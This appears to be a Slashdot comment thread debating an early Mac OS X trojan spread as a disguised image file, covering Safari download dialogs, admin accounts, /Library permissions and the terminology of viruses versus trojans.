Safari still downloads the file to the download directory and leaves it there whether give it the OK to open the file or not. All it's really doing is asking if you want to open the file you just told it to download instead of just downloading the file and making you switch out of Safari to the Finder, locate the file, then open the file. How is there added security by making the user do that additional work? How often will a user manually click to download something that they don't intend to go and open? Maybe there's a few instances where someone clicks the wrong link to DL something and then absentmindedly clicks "OK" to open that file, but even then the Finder will alert you to a new executable being run and require your password to do so - you still have those 2 additional chances to stop things from going any further. If the user doesn't notice that something's amiss when doing all that, what are the odds that they'd notice if they also had to go and manually double-click on the file?

Do you work for Sophos or something?

Re:Now I can say "I told you so".

[goMac2500]

Um. Nothing opens it automatically after downloading. The user has to double click it to open it. Safari will not automatically open things anyway, and will ask you before decompressing anything with an executable in it.

No, you can't say you told us so.

Re:Now I can say "I told you so".

[99BottlesOfBeerInMyF]

No application that displays untrusted content should EVER have an option to open files automatically after downloading.

Wow, that is going to make Web browsing really suck when I have to download the HTML file and all the images and then open them by hand.

Files outside specific "application" or "plugin" locations should never be considered as potential handlers for content, and there must be no mechanism to move files to these locations without an EXPLICIT request by the user. (yes, that means no auto-installing Dashboard plugins or Firefox extensions... and of course ActiveX is beyond the pale)

How does this increase security? At least by auto placing them (with an appropriate dialogue confirmation) the files go in the right place and users aren't accustomed to having to move some random file to some random location to get things to work, which is a lot more dangerous than moving executables to a properly insulated sandbox. (Not that OS X does use a properly insulated sandbox mind you.)

Any way, in this particular case auto-running content is not exploited anyway. you have to manually run the script with a jpeg icon on it.

Re:Now I can say "I told you so".

[geekoid]

Actually I can say that because I helped with several stdudies on those issues. In fact MS (my study was not assiciated to theirs in any way) did a study as well, and even after educating the users, significant portion still wanted it as a feature.

Your analogy isn't even close. It's not correct in method or situation.

Re:Now I can say "I told you so".

[argent]

How is there added security by making the user do that additional work?

Nobody goes and finds a downloaded file and opens it by reflex. It's a deliberate and deferred action. Even from programs with a download manager, it's not something that easily triggers a reflex.

Like I said, I have never had one of my users come to me and say "I did it again, Peter, I've downloaded a file to my desktop and opened it and I've got a virus." I've had people do that once, but never twice. I've had users come to me multiple times saying they'd clicked on the "OK" button again, because they click on that button so many times that it's meaningless.

This is the real world, not some Microsoft sponsored study that presented a false choice between two extreme alternatives. There's lots of better ways to make the job easier on the user without encouraging dangerous habits.

Firefox and Camino give you a better alternative than either option, a download manager that works well, letting you see the files you've downloaded and from there show them in Finder or open them, without having to hunt through anything.

even then the Finder will alert you to a new executable being run and require your password to do so

Um, it will only do that if the guy who wrote the malware is naive. There are so many ways to hide stuff without having privileges that there's no point asking for them.

Do you work for Sophos or something?

Hardly. Sophos answer to the problem is "buy our expensive crap". My answer is "change your behaviour". Antivirus software is a protection racket. I don't use it and I haven't had a virus on any of my personal computers since 1988.

Re:Now I can say "I told you so".

[argent]

even after educating the users, significant portion still wanted it as a feature.

Did you give them the option of a proper download manager (either as part of the application, as in the Mozilla family browsers, or in another program like the BeOS Tracker) or did you give them the two extremes?

Did you pick users who had not previously used either interface, or did they just prefer what they were used to?

Unless the answers are "yes" and "yes", your survey is worthless.

Re:Now I can say "I told you so".

[argent]

Wow, that is going to make Web browsing really suck when I have to download the HTML file and all the images and then open them by hand.

Har bloody har.

At least by auto placing them (with an appropriate dialogue confirmation) the files go in the right place and users aren't accustomed to having to move some random file to some random location to get things to work, which is a lot more dangerous than moving executables to a properly insulated sandbox.

Where did I say that they would have to manually move a file to some random location? I said that they shouldn't do it automatically on download without an explicit request from the user. Navigating to the file in Finder or running it from a download manager counts as a request to run what's in that file.

in this particular case auto-running content is not exploited anyway

Not in Safari, anyway. It seems that AIM is less cautious.

Re:Now I can say "I told you so".

[99BottlesOfBeerInMyF]

Har bloody har.

Hey, you make ridiculous demands, I'll happily demonstrate why they are ridiculous. There are plenty of instances when it is expected and appropriate for a program to download and then automatically display/execute the content of that download.

Where did I say that they would have to manually move a file to some random location? I said that they shouldn't do it automatically on download without an explicit request from the user. Navigating to the file in Finder or running it from a download manager counts as a request to run what's in that file.

Then why did you explicitly mention Dashboard which already asks the user if they would like it to install the file for them?

Not in Safari, anyway. It seems that AIM is less cautious.

I'm confused. First AIM is a protocol. Are you referring to the official AIM client for OS X or something different? And you're saying it auto extracts the .tgz file and then runs the contained script upon transfer? Or are you referring to iChat? Or are you referring to something else entirely?

Re:Now I can say "I told you so".

[argent]

There are plenty of instances when it is expected and appropriate for a program to download and then automatically display/execute the content of that download.

The option I'm talking about, "Open safe files after downloading", does not apply to any of those cases. And you know that.

Then why did you explicitly mention Dashboard which already asks the user if they would like it to install the file for them?

If the user has explicitly requested that the file be run, locally... rather than having that execution happen automatically without anything but simple dialog boxes after the link is clicked... it doesn't matter whether it's an application, a Dashboard widget, a screen saver, the user has explicitly requested execution, rather than simply allowed it to happen.

Now, going back a few messages, you said Safari doesn't automatically run the file. Do you mean that Safari leaves the file in place and you have to explicitly navigate to and open it in Finder, or that Safari gives you a dialog box before calling Finder, which then gives you another dialog box?

Re:Now I can say "I told you so".

Well, most of what you say is simply opinion so there's no point in discussing it further as you're stuck in your current mindset, but...

Um, it will only do that if the guy who wrote the malware is naive. There are so many ways to hide stuff without having privileges that there's no point asking for them.

It may not ask for the password if it doesn't need elevated privileges, but the Finder will prompt when any application is being run for the first time. That dialog box should be coming up pretty rarely for the average user and should definitely get a second thought. Also, it's mostly Windows users that get badly into the habit of just clicking away dialog boxes since Windows and Windows applications throw up so many of them. Most Mac users I've had experience with see them infrequently enough to take a second to look at what's happening.

Of course, you'll just say that isn't the case and move on with your argument. Fine. Perhaps you should mandate a different system that does things "correctly" for the users you have control over and, for the ones you don't, stop the vitriolic whining.

Re:Now I can say "I told you so".

[99BottlesOfBeerInMyF]

The option I'm talking about, "Open safe files after downloading", does not apply to any of those cases. And you know that.

You initially wrote, "No application that displays untrusted content should EVER have an option to open files automatically after downloading." You did not limit this to one option in Safari as evidenced by the "No application" part. Even if you did mean to limit it to Safari, you certainly did not limit it to just one setting in Safari and exclude all the HTML content Safari normally downloads.

If the user has explicitly requested that the file be run, locally... rather than having that execution happen automatically without anything but simple dialog boxes after the link is clicked... it doesn't matter whether it's an application, a Dashboard widget, a screen saver, the user has explicitly requested execution, rather than simply allowed it to happen.

I can't parse this sentence. What are you trying to say here? If you click a link to download something, then Safari warns you with a dialogue that it is an executable and asks if you still wish to download it. Then it asks you if you want it to be automatically installed in the proper location. I don't see the problem.

Now, going back a few messages, you said Safari doesn't automatically run the file. Do you mean that Safari leaves the file in place and you have to explicitly navigate to and open it in Finder, or that Safari gives you a dialog box before calling Finder, which then gives you another dialog box?

Safari warns you the file may be contain an executable when you download it. If you tell it to continue the download it does so and leaves the file in your default download directory. In some configurations it may automatically open the .tgz for you, but all that does is save the contained script in the same location. You still need to navigate to this file with the finder (Safari provides a shortcut in the download manager) and then double click on the script. In order to double click on it, you need to see it in the finder which by default will show you it has the wrong extension and will fail to show a preview of the image, which it shows for all jpegs. Safari is not the problem here.

Re:Now I can say "I told you so".

[argent]

"No application that displays untrusted content should EVER have an option to open files automatically after downloading."

Referring to the Safari "Open Safe Files After Downloading" option and similar mechanism to open files outside the application's own sandbox in other programs.

You still need to navigate to this file with the finder (Safari provides a shortcut in the download manager) and then double click on the script.

Thank you for clearing that up.

In that case, this is a minor problem.

There have been "open safe files" exploits devised in the past, though, and there will unquestionably be some actually exploited in the future.

If you click a link to download something, then Safari warns you with a dialogue that it is an executable and asks if you still wish to download it. Then it asks you if you want it to be automatically installed in the proper location.

The first of those dialog boxes trains people to answer "yes" to these questions.

The second makes it possible to exploit that training.

Two "yes/no" dialog boxes is not significantly better than one "yes/no" dialog box.

It would be far better for Safari to simply download the file and leave it sitting in the download manager, with appropriate indication of its content, without confronting the user with a "yes/no - respond now" dialog.

Re:Now I can say "I told you so".

[99BottlesOfBeerInMyF]

Referring to the Safari "Open Safe Files After Downloading"

Then you incorrectly phrased your sentence. It should read "Safari should NEVER have an option for any application that displays untrusted content to open files automatically after downloading."

Two "yes/no" dialog boxes is not significantly better than one "yes/no" dialog box.

Excepting of course that Apple does not use Yes/No dialogue boxes and their HIG calls for all such boxes to contain action verbs as the button titles. I think in this case you get a (Cancel/Continue) and then an (Install/Don't Install). This largely ameliorates the OK/Cancel rote training that is a problem on Windows.

It would be far better for Safari to simply download the file and leave it sitting in the download manager

The download manager is not a location, it is a list of what has been downloaded. Do you really think it is better to get users used to having to take the downloaded file and put it in some random path? Then what happens when they get a trojan that tells them the file needs to be put in some random location, like the startup directory? Don't you think they will no longer find such a thing unusual? I prefer the current methodology.

Re:Now I can say "I told you so".

[argent]

It should read "Safari should NEVER have an option for any application that displays untrusted content to open files automatically after downloading."

No.

"No application (such as Safari, but not limited to Safari) should have an option to automatically open foreign untrusted content automatically after downloading.

Excepting of course that Apple does not use Yes/No dialogue boxes

It doesn't matter if "Yes" is marked "Yes", "Open", "OK", or "Whack me".

It doesn't matter if "No" is marked "No", "Cancel", "Abandon", or "Go away".

The point isn't what the dialog says, the point is that the dialog presents and accept/deny choice, that accept is the normal response, and the system as a whole presents accept/deny choices on a regular enough basis for it to become a reflex.

People click those buttons before they are consciously aware of what the dialog says or what labels are on the buttons. Windows applications don't always label the buttons "yes" and "no" either, and people still get caught.

Do you really think it is better to get users used to having to take the downloaded file and put it in some random path?

No, and I didn't say they should.

I said that it shouldn't do it automatically without an explicit request.

Clicking "yes", "install", "ok", or "infect me" on a dialog box is not a request, it's approving an action that the untrusted content has requested.

Re:Now I can say "I told you so".

[99BottlesOfBeerInMyF]

The point isn't what the dialog says, the point is that the dialog presents and accept/deny choice, that accept is the normal response, and the system as a whole presents accept/deny choices on a regular enough basis for it to become a reflex.

I think you are still trained by Windowsisms. The dialogues don't represent a dichotomy and may have more than two options when presented. You can't just click "whatever is accept" because you don't know which one it is on a given dialogue. You actually have to read the dialogue and pick which one you want to do.

No, and I didn't say they should. I said that it shouldn't do it automatically without an explicit request.

Look users don't know they have to "install" a dashboard in a specific location. They just want to download and install one from the Web. Your choices are then either give them an automated way to put it where it needs to be, or rely upon instructions that they are given with the file to tell them what to do with it. I think the former is a better option. It is more user friendly and it makes social engineering attacks more unusual and obvious.

Clicking "yes", "install", "ok", or "infect me" on a dialog box is not a request, it's approving an action that the untrusted content has requested.

True, but that does not make them a bad idea. If you have to click "infect me" to get a virus, then you are a lost cause or you probably really want a virus.

Re:Now I can say "I told you so".

[argent]

Look users don't know they have to "install" a dashboard in a specific location.

I didn't say they should have to. I said they should explicitly request an install.

Please try reading for content.

If you have to click "infect me" to get a virus, then you are a lost cause or you probably really want a virus.

I didn't say I thought the people who clicked the equivalent button at work were the brightest bulbs in the box, but that didn't mean I didn't have to go in and clean up after them.

THe Mac guy who insisted he didn't need to set WEP security on his Wifi access point because Macs couldn't get viruses wasn't any brighter.

The people who provide the pool of infected machines on any platform are the source of all kinds of great tech support stories, but you can't ignore them, and when it comes to security you have to design your software with these guys in mind.

Re:Now I can say "I told you so".

[99BottlesOfBeerInMyF]

I didn't say they should have to. I said they should explicitly request an install. Please try reading for content.

You try reading for content. How can they explicitly request a program be installed if they don't know it needs to be installed. This is OS X. Installing is a rarity, most programs are dropped in the Applications folder. Dashboards won't work there and need to be put in a specific place. That means they need to be moved by the system or they need to have instructions the user follows. You propose adding extra, unnecessary steps to the process because you believe dialogue boxes are inherently insecure. You're wrong. Extra steps leave extra room for social engineering. Dialogue boxes work when properly implemented, as I believe they are in this case.

I didn't say I thought the people who clicked the equivalent button at work were the brightest bulbs in the box, but that didn't mean I didn't have to go in and clean up after them.

Here's an idea, just cut the power cords of the machines. They won't do anything then and you won't have to clean up after anything. Good security lets the user do what they want and informs them what is going on. What you propose is making it hard for users to do what they want in the hopes that they will give up.

Re:Now I can say "I told you so".

[argent]

How can they explicitly request a program be installed if they don't know it needs to be installed.

If the program needs to be installed, what they will download will be an installer, so when they explicitly request it by opening it in Finder it will be installed. Similarly, other files that need to be installed already have handlers that Finder can use after the user requests it to install.

The only difference is that instead of facing the user with a "choose now" dialog box, the user makes an explicit request to open the object when they decide to. That small difference, between "responding to a dialog requesting action" and "making a request for action" makes a huge difference.

Good security lets the user do what they want and informs them what is going on.

I agree. Good security lets the user do what they want. Good security doesn't let a potential attacker do what they want, subject to a snap decision by the user.

I am not proposing making it hard for the user at all. For the normal case, the user will even end up performing the same number of actions: instead of clicking "Open" in the dialog box, they will select "Open" in the download manager.

Re:Now I can say "I told you so".

[99BottlesOfBeerInMyF]

If the program needs to be installed, what they will download will be an installer, so when they explicitly request it by opening it in Finder it will be installed. Similarly, other files that need to be installed already have handlers that Finder can use after the user requests it to install.

And you think this is a good idea from a security perspective? You're no where near paranoid enough. Most security people I know avoid installers whenever possible, since it is already the method of choice for installing spyware, rootkits, and messy programs that scatter files everywhere. The only reason to use one is for a program that needs to install new kernel modules, drivers, or subsystem elements. Regular user space applications, or applets that use them make me very, very suspicious. I'd much rather the OS is hard wired to put dashboard widgets only in their proper place than that users are conditioned to run arbitrary "installer" applications that put files wherever and do who knows what else. Think about it, what is worse a user is tricked into having a possibly malicious widget installed in the right place so that if they ever run that widget and it has permission it can do damage, or a user is tricked into running a malicious installer that runs right then (and users are already conditioned to think installers often need your password for some reason). No thanks.

I agree. Good security lets the user do what they want. Good security doesn't let a potential attacker do what they want, subject to a snap decision by the user.

You don't get it. A "snap decision by the user" is another way of saying "a quick and easy action based upon the user's choice." All you are adding is making it harder to do things because you think it will make users think more. All you are doing is proposing a harder to use UI, with additional steps to confuse the user and add social engineering attack space.

instead of clicking "Open" in the dialog box, they will select "Open" in the download manager.

No, since the download manager is specific to the downloading application.

I just don't agree with your recommendations. They are all based upon the premise that dialogue boxes are bad. As a security guy and a UI guy my opinion is they are not. Just because one implementation is bad does not mean the concept is bad. They work and work well. As it stands, the system is more secure, in my opinion, than any of your suggested improvements.

Re:Now I can say "I told you so".

[argent]

And you think this is a good idea from a security perspective?

What, that a program shuld come in an installer? No, I didn't say that. I said that when installation is required, it already comes in an installer.

I'd much rather the OS is hard wired to put dashboard widgets only in their proper place than that users are conditioned to run arbitrary "installer" applications

I didn't say that you would use "installer" applications for things like dashboard widgets. I said that, just like right now, Finder would call LaunchServices to find the right application to open (in this case, install) the widget.

The only difference is that Safari wouldn't be asking Finder to do it at the request of a potential attacker, but rather at the request of the user.

All you are adding is making it harder to do things because you think it will make users think more.

It's the same number of steps. It's not harder, it's a slightly different process that changes the operation from one that's initiated by the attacker to one that's initiated by the user.

And it's not making users think more, it's giving them a chance to think, and it really does work.

They are all based upon the premise that dialogue boxes are bad.

No, they are based on the premise that in this context dialog boxes do not add enough to the security of the system. They're not "bad", they're just not the right tool to use here.

Trusted executables

[seweso]

Why not mark every executable from external sources as not-trusted? And when an untrusted executable is executed a dialog should be presented.

Re:Trusted executables

[John+Newman]

OSX sort-of does this already. Whenever you launch an executable for the first time - either directly or indirectly, by opening a dependent data file - OSX puts up a prompt warning you that you are about to execute program XXX for the first time, and asking if you're sure you want to do this. So every executable is considered non-trusted the first time you run it. This trojan ought to trigger this dialog, which I'd think would cause even most novice users to wonder if something odd was going on.

Bon Jour?

[Rob+Nance]

Surprised nobody has said it yet, but who uses Bon Jour? I've never even heard of it. iChat or Fire for me. I know this problem is not Bon Jour specific, but like lots have said, Safari will ask when an executable is being received via download. We all know IM is susceptible, and we all know OSX is not bulletproof. Use common sense and move along, nothing to see here.

Re:Bon Jour?

[LemonYellow]

Bonjour is the new name for Rendezvous. It isn't an application like Fire or iChat, it is a mechanism for programmes to find each other over a network. If you're using iChat, you're using a programme that includes Bonjour; It is how iChat finds other iChat users on the local network.

Re:Bon Jour?

[davidsyes]

Maybe Jon Bon Jour-VII?

/Library permissions

[alanQuatermain]

Disclaimer: I write network management software for Mac OS X; I have therefore seen a fair bit of what can happen with mis-configured system folders

I'd advise you not to change permissions on /Library, or at least please don't do it recursively. You're asking for pain there. /Library/Application Services, /Library/Caches, /Library/Frameworks are supposed to be writable by administrators.

The reason your root library folder is writable by members of the Admin group is because that's what it's for. There's /System/Library, which is owned by root/wheel. There's /Library, which is where the machine's administrator can install things for all other users, and there's ~/Library where any user can write their own things into their own personal space.

The reason the root one is writable by admins is simply because that's the place where admins (which are, you know, admins for a reason) can write things. Things like all the fonts installed by Macromedia Flash. Things like all the project templates, SCM, Design, WebObjectsGUI plugins for Xcode. Things like InterfaceBuilder palettes. Things like Adobe fonts, SVG viewer resources, color profiles. You know, thing used by all users of the machine. But which a machine administrator can change or remove. That's kinda the point of the Admin group.

Also, please take note that the sticky bit is set on the Library folder. So you'll need to chmod 1775 /Library. Oh, and I hope you're prepared for some stuff to stop working, because it quite likely will. I've seen whata happens when people decide to arbitrarily make most of the system writable only by their One True User (whoever that may be). I then get many tech support calls where we try to figure out why my software is making all their software stop working. It then transpires that their software just doesn't have permission to access the disk, and just can't install things, use caches, etc. Or it's using a home folder -- mounted from a remote server -- for all that, and is therefore taking *ages* since another fifty people are doing the same thing.

At the end of the day, there probably is an argument for not letting Admin account create folders within the /Library folder, so for example only root can create the InputManagers folder. That would be the same as the StartupItems thing, and it's likely what Apple will do. But don't apply those rules to Application Support and suchlike. It'll hurt, believe me.

-Q

Re:/Library permissions

[geekoid]

Now see, you warned him, and that took all the funny away.
I was happy thinking this guy was giong to create himself a barrel of interesting times.

Power Button?

[ProfessionalCookie]

Mac users don't use their power buttons to shut down their computers. The power button puts the computer to sleep.

PS What do you mean by "turn a computer off"...is that like a "restart"

Time to get into the habit of read-only filesys?

[reed]

I wonder if it would make sense for MacOSX (And user-oriented Linux distributions?) to keep all binaries and libraries etc. (i.e. not /home) normally read-only (unless you are in the middle of uninstalling/upgrading of course). (I know that some people keep servers and "appliance" type systems like this already). Until now, this kind of trojan has been localized and rare, but with the popularity of OSX, this one could be a turning point.

Anyone want to make a hack of dpkg to try this on Debian?

Re:Um, OK

My password is "password" and my IP address is 192.168.1.100.

Do your worst!

Re:Time to get into the habit of read-only filesys

[argent]

I wonder if it would make sense for MacOSX (And user-oriented Linux distributions?) to keep all binaries and libraries etc. (i.e. not /home) normally read-only (unless you are in the middle of uninstalling/upgrading of course).

They do. Normal users have no write access to system directories, the installation process runs as a privileged user that has write access. The thing is, you don't need write access to system directories to launch malware, or have it auto-executed when you log in... there's plenty of places for it to hide in your home directory in any system...

sophos press-release:

[srblackbird]

http://www.sophos.com/pressoffice/news/articles/20 06/02/macosxleap.html
Is this the same?
They say it's a worm...

malware doesn't need privileged access

[argent]

Malware doesn't need privileged access to find a hiding place.

When I was at Berkeley in 1978 people were already putting trap files in their home directories to catch people snooping around and do nasty stuff to the intruder's accounts, including hiding backdoors in their login scripts... and this was on Version 6 UNIX, a system so primitive the shell didn't even have native flow control built in.

Restricting the scope of malware by restricting user privileges is great, it gives you an easier recovery path, but it's not a panacea.

Human Stupidity

[SchrodingersRoot]

First, let me say that human stupidity is how the vast majority of malware spreads, and can generally be relied upon. It's one of those, ya know...universal constants. As Einstein said: "Only two things are infinite, the universe and human stupidity, and I'm not sure about the former." Moreover, if Apple picks up marketshare, especially with iMacs (e.g. more of a consumer level product), as it could be poised to do with the Intel deals struck, the average level of user savvy will drop. So stupidity can be relied upon to increase. Especially since knowledgable users are more wary of Intel procs in general (though the mobile chips are somewhat excepted here). However, it is, as you imply, worthy of note that it doesn't exploit security holes.

Anyway, I can't help but idly wonder if /. mightn't have had something to do with this, what with the article that appeared a month ago. Sort of a proof of concept challenge, if you will.

Oblig. Symantec Link.

[Khyber]

This is not a virus. It's not self-replicating. Implant this very helpul link's information into your brain, so we can finally understand WTF the difference is between virii/trojans/worms.

Take the advice from one of the 'top' companies in AV protection.

Re:Oblig. Symantec Link.

[geekoid]

"...virii/trojans/worms."

virii is not a recognized use, and if you can't get that through your brain, it certianly shouldn't be giving information about Viruses/trojans/worms in general. Even your link uses the correct term.

Besides this, the specific definintion no longer matters outside of the AV industry. Users don't care, they just want it fixed.

http://en.wikipedia.org/wiki/Virii

http://linuxmafia.com/~rick/faq/plural-of-virus.ht ml

http://foldoc.org/?viruses

boy, you guys are deperate for an exuse.

[geekoid]

Look, we know technically it is not a virus; but I have to say "Welcome to the world." All these things get labeled as a virus. The PC world faught that for years, but ultimatly the media has won. Mostly because people don't care. All they care about is that it is impacting their machine and they want it fixed.
It's like when someone starter goes ut in their car. They don't want a 20 minutes lecture on why, they just want to know how much it costs, and how soon it will be ready.

Gentlemen, start your time machines...

[mikiN]

This exploit is actually an example of a very old idea. A proof of concept can be found in this followup article from March 2004 (the link to the original article is already dead and buried), which also mentiones the need to visually identify executable files.

This was a prey lame virus

[ChrisA90278]

It's a perty poor virus. The OS puts up a dialog box stating that there is an executable program inside and asks you to type in the Admin password and click OK to run it. A user would need to be "way stupid" to do that when he thought he was just going to look at aJPG image file. Needless to say this "virus" did not get very far ad no one knows of any damage caused by it.

computer system is only as secure...

[lcde]

This article gives a lot of good points in a short amount of time.

The jist of it is that *nix IS more secure. There is no doubt about it. But Social Engineering and other things of the great modern email scams can still penetrate in and run.

But I guess that goes without saying. The chain is only as strong as your weakest link and the computer system is only as secure as its stupidest user.

This wasn't discussed. All the article talks about is a virus that comes into your /home directory and destroys your data. Unix still runs, no downtime, start again. Really only the recent Karma Sutra virus goes around and destroys data. Most act as zombie drones.

But imagine this. A computer virus comes in your system and runs in your /home(user done). It doesn't destroy your computer but installs as a .bashrc line to execute in some common User priveldged library. Now, to us we might see that the file was modified or that there is a file that we didn't install hidden in our home directory. But really, who here knows whats in .firefox/default/aso8zx9mawmSOI/ ? I sure as hell don't. And there has to be some GUI linux programs that run background command lines so you know .bashrc will be executed. So the .css files that are in .firefox/default/aso8zx9mawmSOI/, name your virus chrome_main.css. When was the last time you checked that folder for executables?

Especially in an OSX enviroment where the users are tricked to believe that the system is secure. As a unix system it might never get any worms or other propigating viruses embedded deep into the system but there are still a ton of stupid users.

You can even imagine it being smart enough to update itself IF a OSX vulnerablility is known and then elevate itself to root and install deeper into the OS. I have no clue whats in /Library and I normally don't fool around with it. Or even /bin/gnuc and if you execute it without the proper switch it just prints out 'The program cannot be executed in the terminal, It must be called from another program'.

Either case good short read.( i think my comments are almost longer) No matter how good we think we are at knowing our systems there is someone who knows we don't look in /random/directory that is known to have write access to all users. This is where a virus can lay around and execute.

Re:computer system is only as secure...

[geekoid]

"...computer system is only as secure as its stupidest user."

actually I think:
computer system is only as secure as its stupidest developer.

is far more accurate.

and then:
computer system security implementation is only as secure as it's stupidest user.

Re:I call Dupe

> Apple made it so that the .app extension cannot be hidden

What? None of the applications in my /Applications folder have the '.app' extension visible (but the extension is there).

God you idiots are stupid

You're wasting your day coming up with solutions for an OS you don't own, don't maintain, and have no control over.

You're such idiots. No wonder slashdot has such a crappy reputation. It's full of morons who think they're brilliant.

Re:It's not a virus... bzzt. Wrong Fanboi!

Definition of a virus from wikipedia: In computer security technology, a virus is a self-replicating program that spreads by inserting copies of itself into other executable code or documents. This virus does these things. It replicates itself into other executable code or documents. It spreads itself via iChat to your contacts. Arguing that it isn't a virus because someone has to do something to activate it shows a good level of cluelessness. Hint - look up the definition for 'worm'. Perhaps that's what you're thinking of. Those who are calling it a Trojan are even further off the mark. Trojans don't spread themselves. Sorry, you're wrong. Try again later.

I'm curious

[Tim+Browse]

This seems to be exactly the same type of attack as a lot of the Windows email worms - e.g. give the user a file that is of type A, but fool them into thinking it's of type B (and hence less dangerous).

If instead of failing to do something to Fire.app, the trojan had scurried through the Mac OS X address book, and then sent the file as an attachment in an email to all your contacts, and some of them had opened the attachment, etc. and so it had propogated like that, then would the Mac zealots admit there was a problem then?

My main question is - what actually causes the admin authentication dialog to open? Is it just the fact that you're trying to run a program that Mac OS X hasn't seen before? If not, then would trying to open a TCP/IP socket (e.g. to a mail server) cause the user to have to authenticate as admin? If not, then this seems like a lucky escape to me - this could have spread quite widely amongst Mac users.

Btw, Windows has a system for marking EXEs as untrusted (in some way - using a special stream, iirc) - IE and FF do this, I believe. So the first time you try to run the EXE, Windows asks if you're sure, and explains why. Does Mac OS X do this? Is this why the admin dialog appears?

Enquiring minds want to know. :-)

(BTW, anyone claiming Mac users wouldn't fall for social engineering in the first place needs to get a grip)

Re:I'm curious

[cnerd2025]

Mac OS, like all Unix systems, requires higher-level access for different function calls. Think about, for example, NMap. It requires root access to run most of its features, otherwise it will only perform a few functions. This permissions-based system is also used in Mac OS X. If a program makes a function call that requires special authorization, then the little prompt comes up and asks for the admin password. You don't have to enter the password more than once for a particular application's session, but once it is closed, it must be reauthenticated. For example, to change settings in the "system preferences" application, one must enter the password for certain panes to be accessible. When sys prefs is closed or a little "lock" is locked, the same thing must happen. Also, when apps are being installed, Mac OS has a subroutine in its installer requiring administrative password authentication. Permissions-based file systems are much more secure than Windows type file systems, where access is granted for most directories, and is "denied" for others. Most of the "denied" directories I find to be viruses. This may be considered a virus, simply because it was written to be one. But if it pops up and asks for a password, it is nothing more than a sitting duck. What Apple needs to do is wake up and patch the Unix flaws that have been fixed for 15 years. They are probably all documented from various BSD resources, and many of the flaws can probably be fixed directly from their source code.

Re:I'm curious

[Tim+Browse]

Two things:

1. You seem to be using 'permissions-based file systems' to refer to the default permissions? And not to refer to the fact that the file system supports permissions of various levels. For instance, Windows ACLs permissions have finer granularity that Unix-style permissions (Tiger added support for ACL style permissions). Or am I misunderstanding?
2. So is opening a socket deemed to be a function call that requires administrative authorisation? I find it somewhat hard to believe that MSN Messenger, Fire, iChat etc all require you to authorise them with system permissions whenever they open a connection to a server or peer? (Mainly because I've used Messenger on OS X, and I don't remember it ever asking me for an admin password.)

So my point is, in case it's not clear, if you can get the user to run a program in this fashion, then the program can propogate across the internet without needing admin privileges?

The brilliance of shipping iPhoto with new Macs

[SuperKendall]

I just realized how amrt it is of Apple to ship iPhoto with new consumer macs.

See, if a trojoan like this comes along with something unpleasant really novice users will try to move it into iPhoto - which will just say "sorry, that's not an image".

More advanced users that would just try and open an image in Preview would say "Opening an image file and it asks for my password? No thank you sir!".

Which is why this trojan has not really spread, or really affected many computers.

FUD of the day

[Overly+Critical+Guy]

This story is the biggest FUD of the day.

1.) Several proof-of-concept viruses have been written for OS X in the past, so this isn't the "first." They never propagate.

2.) When you download this .tgz file in Safari, Safari warns you that it's an application, and you have to click to continue.

3.) When you run it, an admin password prompt is displayed by OS X, and you have to enter it to continue.

Like I said--FUD of the day.

Re:FUD of the day

[toadlife]

"2.) When you download this .tgz file in Safari, Safari warns you that it's an application, and you have to click to continue."

So does every other browser on the planet. This saftey feature doesn't seem to ptotect Windows users. Why would it protect Mac users if there were enough of them to be relevant?

"3.) When you run it, an admin password prompt is displayed by OS X, and you have to enter it to continue."

Does every single program you run in OSX require an admin password, or just programs that try to write outside of the user's space? Could not a program be written to stay inside of the user's space and thus, not require a password?

Re:FUD of the day

[Overly+Critical+Guy]

Safari scanning compressed files and warning users that it's got an executable (requiring the user to click "Download" to continue) means this is a user flaw, not a system flaw. Other browsers warn too, though not for compressed files, but that means this isn't an OS X virus or trojan but a user-run program. And even so, applications like this that attempt to modify the system or the user's settings (like InputManager) require a password. A program written "inside of the user's space" as you put it wouldn't have much to do and wouldn't propagate.

Re:FUD of the day

[javaxman]

3.) When you run it, an admin password prompt is displayed by OS X, and you have to enter it to continue.

... with the important exception of when you're running as an Admin user, in which case you don't get this important opportunity to prevent the program from modifying files it shouldn't.

I don't know anyone stupid enough to use their OS X admin account all the time... OK, I lied. I really have to stop using this admin account... damn...

Of course, that whole file-extension thing should be a big tip-off, too. It's not like this is going to spread like wildfire. It's just a wake-up call to folks
(a) hiding file extensions... why do that? Show them, they're important.
(b) running as Admin. We have to not be so lazy. It's ok that we'll have to type our password.

But mostly (b). If some old-school OS 9 user can't grock file extensions, they sure as shoot shouldn't be using an Admin account...

Re:FUD of the day

[AvitarX]

Can the user send email messages?

use telnet?

modify things to start when they log in?

delete files?

all of those seem dangerous to me.

Also, disguised program tricking the user to click it and doing destructive things sounds like what a trojan is, but again I am not really in the know.

Re:FUD of the day

[toadlife]

In the two OS's I run (FreeBSD and Windows), programs can easily stay inside of the users space and still propogate - for example, by connecting out via email, or IRC, and they can easily set themselves to start at boot-time, before logon (FreeBSD : crontab/Windows: Task Scheduler).

What in OSX prevents this?

Can regular users in OSX start their own crontab? Can an IRC client executable run from a users folder? How about a little self contained SMTP engine?

As for other browsers not giving out warnings like Safari, for a any file you download, Internet explorer warns that 'Files from the internet might be dangerous, and not to open the file if you don't trust the source'. Firefox just asks what you want to do - open or save.

Re:FUD of the day

[99BottlesOfBeerInMyF]

1.) Several proof-of-concept viruses have been written for OS X in the past, so this isn't the "first." They never propagate.

This isn't a "proof-of-concept" it was discovered in the wild, albeit at a direct point of infection. It has already propagated, or attempted to, in the wild as well, sending file transfer requests to other machines on a LAN.

2.) When you download this .tgz file in Safari, Safari warns you that it's an application, and you have to click to continue.

If I'm not mistaken it warns you that it "might be" an application, as it does with all archives in .zip, .gtz, or .dmg format. Also, not everyone uses Safari.

3.) When you run it, an admin password prompt is displayed by OS X, and you have to enter it to continue.

...Unless you are running an admin account. Then it just runs. Like a lot of clueless people who only set up one account when they buy a machine. Maybe even most people.

This is not going to spread far and wide for numerous reasons and has no real payload and bugs prevent it from working properly. This is not a serious threat to most people. It is however, a first OS X virus in the wild and seems to have been written by someone with a clue. It also seems unfinished. This may be the basis for more malware in the future.

OS X does better than most OS's under this type of an attack and this threat is minimal. Hopefully, however, this will spur Apple to actually improve the default security of their systems both with a default non-admin account on setup, with better GUI indications of what a file is and is doing, and with BSD jail, VM sandboxes, or really cool ACLs that default to limited permissions for any new software. Frankly, Windows desperately needs this right now, but OS X could benefit from it as well and give MS something to copy.

Re:FUD of the day

[MattHaffner]

... with the important exception of when you're running as an Admin user, in which case you don't get this important opportunity to prevent the program from modifying files it shouldn't.

